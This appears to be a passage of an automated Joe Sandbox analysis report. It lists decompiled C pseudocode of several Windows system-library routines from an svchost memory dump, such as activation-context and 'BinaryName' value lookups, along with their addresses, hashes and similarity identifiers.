                        C-Code - Quality: 75%
                        			E0305F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E03044120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03069830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03069990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E030695D0();
							goto L11;
						} else {
							_t109 = L03044620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0306F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E030695D0();
										L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                        0x0305f0d3
                        0x0305f0d9
                        0x0305f0e0
                        0x0305f0e7
                        0x0305f0f2
                        0x0305f0f4
                        0x0305f0f8
                        0x0305f100
                        0x0305f108
                        0x0305f10d
                        0x0305f115
                        0x0305f116
                        0x0305f11f
                        0x0305f123
                        0x0305f124
                        0x0305f12c
                        0x0305f130
                        0x0305f134
                        0x0305f13d
                        0x0305f144
                        0x0305f14b
                        0x0305f152
                        0x0309bab0
                        0x0309bab0
                        0x0305f158
                        0x0305f158
                        0x0305f15a
                        0x0305f160
                        0x0305f165
                        0x0305f166
                        0x0305f16f
                        0x0305f173
                        0x0309baa7
                        0x0309baa7
                        0x0309baab
                        0x00000000
                        0x0305f179
                        0x0305f18d
                        0x0305f191
                        0x0309baa2
                        0x00000000
                        0x0305f197
                        0x0305f19b
                        0x0305f1a2
                        0x0305f1a9
                        0x0305f1af
                        0x0305f1b2
                        0x0305f1b6
                        0x0305f1b9
                        0x0305f1c4
                        0x0305f1d8
                        0x0305f1df
                        0x0305f1e3
                        0x0305f1eb
                        0x0305f1ee
                        0x0305f1f4
                        0x0305f20f
                        0x0309bab7
                        0x0309babb
                        0x0309bacc
                        0x0309bad1
                        0x0305f215
                        0x0305f218
                        0x0305f226
                        0x0305f22b
                        0x00000000
                        0x0305f22b
                        0x0305f1f6
                        0x0305f1f6
                        0x0305f1f9
                        0x0305f1fb
                        0x0305f1fb
                        0x0305f1f4
                        0x0305f191
                        0x0305f173
                        0x0305f152
                        0x0305f203

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction ID: fbefda3bcc0a5f04bed458621fc37a42c351e219aefad9340796a38778fb0c00
                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                        • Instruction Fuzzy Hash: 80519E755057119FD320DF19C840A6BBBF8FF88710F00892EF9959B690E7B4E904CBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A3540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                        Download Yara Rule
                        C-Code - Quality: 75%
                        			E030A3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x311d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03060BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E030A3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0306FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E030A3540;
						E0306FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0307DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E030B0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E030697C0();
					}
					return E0306B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E030A3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E030A3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0306FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03069650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E030A3787(_a4,  &_v352, _t80);
						}
					}
					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E030695D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                        0x030a3552
                        0x030a355a
                        0x030a355d
                        0x030a3566
                        0x030a3567
                        0x030a357e
                        0x030a358f
                        0x030a35a1
                        0x030a35a5
                        0x030a366b
                        0x030a366b
                        0x030a366d
                        0x030a3672
                        0x030a3679
                        0x030a3685
                        0x030a368d
                        0x030a369d
                        0x030a36a7
                        0x030a36b8
                        0x030a36c6
                        0x030a36c7
                        0x030a36dc
                        0x030a36e1
                        0x030a36e7
                        0x030a36e9
                        0x030a36e9
                        0x030a3703
                        0x030a3703
                        0x030a35b5
                        0x030a35c0
                        0x030a35c4
                        0x00000000
                        0x00000000
                        0x030a35ca
                        0x030a35d7
                        0x030a35e2
                        0x030a35e6
                        0x030a35e8
                        0x030a35f5
                        0x030a35fa
                        0x030a3603
                        0x030a3604
                        0x030a3609
                        0x030a360a
                        0x030a3612
                        0x030a3613
                        0x030a361e
                        0x030a3622
                        0x030a3628
                        0x030a362f
                        0x030a362f
                        0x030a3636
                        0x030a3638
                        0x030a363b
                        0x030a3642
                        0x030a3642
                        0x030a3636
                        0x030a3657
                        0x030a3657
                        0x030a365c
                        0x030a3662
                        0x030a3669
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: BinaryHash
                        • API String ID: 2994545307-2202222882
                        • Opcode ID: bc6ca0be9c582b90d37e5154d5440ef5bb96d6a97059e7e775a13d46abdaab0e
                        • Instruction ID: 379e529fcddfea1df9c0c3cdb4b97e625c3d43e3a9ea44c30e15b441ace31d02
                        • Opcode Fuzzy Hash: bc6ca0be9c582b90d37e5154d5440ef5bb96d6a97059e7e775a13d46abdaab0e
                        • Instruction Fuzzy Hash: 3A4178F5D0162C9BDB21DA94DC81FDEB77CAB44714F0085E5E608AB240DB319E88CF94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030F05AC Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                        Download Yara Rule
                        C-Code - Quality: 71%
                        			E030F05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E030F07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03069730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E030EA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E030EA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E030F1293(_t79, _v40, E030F07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E03047D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E030E138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                        0x030f05c5
                        0x030f05ca
                        0x030f05d3
                        0x030f06db
                        0x030f06db
                        0x030f06dd
                        0x030f06e3
                        0x030f06e3
                        0x030f05dd
                        0x030f05e7
                        0x030f05f6
                        0x030f0600
                        0x030f0607
                        0x030f0610
                        0x030f0615
                        0x030f061a
                        0x030f061c
                        0x030f061e
                        0x030f0624
                        0x030f0625
                        0x030f0627
                        0x030f0628
                        0x030f0631
                        0x030f0640
                        0x030f064d
                        0x030f0654
                        0x030f0654
                        0x030f0631
                        0x030f066d
                        0x030f0674
                        0x00000000
                        0x00000000
                        0x030f0692
                        0x030f069e
                        0x030f06b0
                        0x030f06a0
                        0x030f06a9
                        0x030f06a9
                        0x030f06b8
                        0x030f06d6
                        0x030f06d6
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: `
                        • API String ID: 0-2679148245
                        • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction ID: 3d5f3f8e6282ddef27daafa1280c9e1ec66d9e2d8faf5c44cad66b20a5d158af
                        • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                        • Instruction Fuzzy Hash: F631F132701345AFE720DE24CD84F9BB7D9ABC4754F084229FA58DBA81D770E904CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 030A3884 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E030A3884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03069650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L03044620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03069650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}















                        0x030a3893
                        0x030a3896
                        0x030a3899
                        0x030a389f
                        0x030a38a0
                        0x030a38a4
                        0x030a38a9
                        0x030a38ac
                        0x030a38ad
                        0x030a38ae
                        0x030a38af
                        0x030a38b1
                        0x030a38b4
                        0x030a38bb
                        0x030a38bc
                        0x030a38bd
                        0x030a38c4
                        0x030a38c8
                        0x030a38ca
                        0x030a38ca
                        0x030a38d5
                        0x030a393e
                        0x030a3940
                        0x030a3942
                        0x030a3952
                        0x030a3954
                        0x030a3961
                        0x030a3961
                        0x030a3967
                        0x030a396e
                        0x030a396e
                        0x030a3947
                        0x030a394c
                        0x00000000
                        0x030a394c
                        0x030a38ea
                        0x030a38ee
                        0x030a38f8
                        0x030a38f9
                        0x030a38ff
                        0x030a3900
                        0x030a3902
                        0x030a3903
                        0x030a390b
                        0x030a390f
                        0x030a3950
                        0x00000000
                        0x030a3950
                        0x030a3915
                        0x030a391d
                        0x030a391d
                        0x030a3922
                        0x030a3926
                        0x00000000
                        0x030a3928
                        0x030a392b
                        0x030a392b
                        0x030a3935
                        0x030a3937
                        0x030a3937
                        0x00000000
                        0x030a3935
                        0x030a3926
                        0x030a38f0
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID: InitializeThunk
                        • String ID: BinaryName
                        • API String ID: 2994545307-215506332
                        • Opcode ID: 3e1981ada5b38658781296c198728de5dc3b7f093d5317352ed32ce031041d11
                        • Instruction ID: 32974f362d093bf4b4b9b864dc07eea1b24783086fe2ac181a5d2b3445939a2e
                        • Opcode Fuzzy Hash: 3e1981ada5b38658781296c198728de5dc3b7f093d5317352ed32ce031041d11
                        • Instruction Fuzzy Hash: B631087AD06A09AFDB15DA9CD945EAFF7B4EB80720F0541A9E914AB240D7319E04C7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0305D294 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                        Download Yara Rule
                        C-Code - Quality: 33%
                        			E0305D294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x311d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E03044120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0306B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E030698D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E030695D0();
					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                        0x0305d29c
                        0x0305d2a6
                        0x0305d2b1
                        0x0305d2b5
                        0x0305d2b6
                        0x0305d2bc
                        0x0305d2bd
                        0x0305d2be
                        0x0305d2bf
                        0x0305d2c2
                        0x0305d2c4
                        0x0305d2cc
                        0x0305d384
                        0x0305d34b
                        0x0305d34f
                        0x0305d350
                        0x0305d351
                        0x0305d35c
                        0x0305d35c
                        0x0305d2d6
                        0x0305d2da
                        0x0305d2e1
                        0x0305d361
                        0x0305d369
                        0x0305d36d
                        0x0305d2e3
                        0x0305d2e3
                        0x0305d2e3
                        0x0305d2e5
                        0x0305d2ed
                        0x0305d2f5
                        0x0305d2fa
                        0x0305d302
                        0x0305d303
                        0x0305d30b
                        0x0305d30f
                        0x0305d313
                        0x0305d318
                        0x0305d31c
                        0x0305d320
                        0x0305d379
                        0x0305d37d
                        0x00000000
                        0x00000000
                        0x0309affe
                        0x0309b001
                        0x0309b011
                        0x00000000
                        0x0305d322
                        0x0305d322
                        0x0305d330
                        0x0305d337
                        0x0305d35d
                        0x0305d339
                        0x0305d33f
                        0x0305d38c
                        0x0305d38c
                        0x0305d33f
                        0x0305d349
                        0x00000000
                        0x0305d349

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: @
                        • API String ID: 0-2766056989
                        • Opcode ID: cd811d8483fad9e787b1424310f19c193c29d6d7ca6516a7feec10cbb2b9791c
                        • Instruction ID: 50b14bc31842ef44a8472a55dd7d9975ecfc79dee7b79b58dfee92833e2cb649
                        • Opcode Fuzzy Hash: cd811d8483fad9e787b1424310f19c193c29d6d7ca6516a7feec10cbb2b9791c
                        • Instruction Fuzzy Hash: 0931AFB550A3059FC750DF28C9809AFBBE8EBD9654F04092FF99487210D635DE04CB96
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 03031B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                        Download Yara Rule
                        C-Code - Quality: 72%
                        			E03031B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0306BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0306A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0306A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L030477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03044620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                        0x03031b8f
                        0x03031b9a
                        0x03031b9c
                        0x03031b9e
                        0x03031ba3
                        0x03087010
                        0x03087010
                        0x00000000
                        0x03031ba9
                        0x03031ba9
                        0x03031bae
                        0x00000000
                        0x03031bc5
                        0x03031bca
                        0x03031bcf
                        0x03031bd0
                        0x03031bd1
                        0x03031bd2
                        0x03031bd6
                        0x03031bdc
                        0x03031be0
                        0x03086ffc
                        0x03087000
                        0x00000000
                        0x03087006
                        0x03087009
                        0x03087009
                        0x03031be6
                        0x03031bec
                        0x03031c0b
                        0x03031c0b
                        0x03031c0c
                        0x03031c11
                        0x03031c12
                        0x03031c15
                        0x03031c1b
                        0x03031c1f
                        0x03031c31
                        0x03031c33
                        0x03087026
                        0x03087026
                        0x03031c21
                        0x03031c24
                        0x03031c24
                        0x03031bee
                        0x03031bee
                        0x03031bf2
                        0x03031c3a
                        0x03031bf4
                        0x03031bf4
                        0x03031c05
                        0x03031c05
                        0x03031c09
                        0x03031c3e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x03031c09
                        0x03031bec
                        0x03031be0
                        0x03031bae
                        0x03031c2e

                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                        • Associated: 00000011.00000002.514645489.000000000311B000.00000040.00000800.00020000.00000000.sdmpDownload File
                        • Associated: 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_3000000_svchost.jbxd
                        Similarity
                        • API ID:
                        • String ID: WindowsExcludedProcs
                        • API String ID: 0-3583428290
                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction ID: 401ee6decbd3a9ec4af95fd6c894f3b9a203b77404e3a9fa44b2f12b05a0970b
                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                        • Instruction Fuzzy Hash: 6221287A503218EBCB25FA55C840F9FB7ACAF8AA10F194865F9149B204D634DD018BB0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0304F716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0304F716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                        0x0304f71d
                        0x0304f722
                        0x0304f726
                        0x03094770
                        0x0304f765
                        0x0304f769
                        0x0304f769
                        0x0304f732
                        0x0309477a
                        0x00000000
                        0x0309477a
                        0x0304f738
                        0x0304f73a
                        0x0304f73c
                        0x0304f73f
                        0x0304f746
                        0x0304f778
                        0x0304f7a9
                        0x0304f7a9
                        0x0304f754
                        0x0304f75a
                        0x0304f75d
                        0x0304f75f
                        0x0304f761
                        0x0304f76f
                        0x0304f771
                        0x0304f771
                        0x0304f76f
                        0x0304f763
                        0x00000000
                        0x0304f763
                        0x0304f77d
                        0x0304f7a3
                        0x0304f7a5
                        0x00000000
                        0x0304f7a5
                        0x0304f77f
                        0x0304f782
                        0x0304f784
                        0x0304f786
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0304f788
                        0x0304f748
                        0x0304f74d
                        0x0304f78d
                        0x0304f793
                        0x0304f7b7
                        0x0304f7bc
                        0x00000000
                        0x0304f7bc
                        0x0304f798
                        0x00000000
                        0x00000000
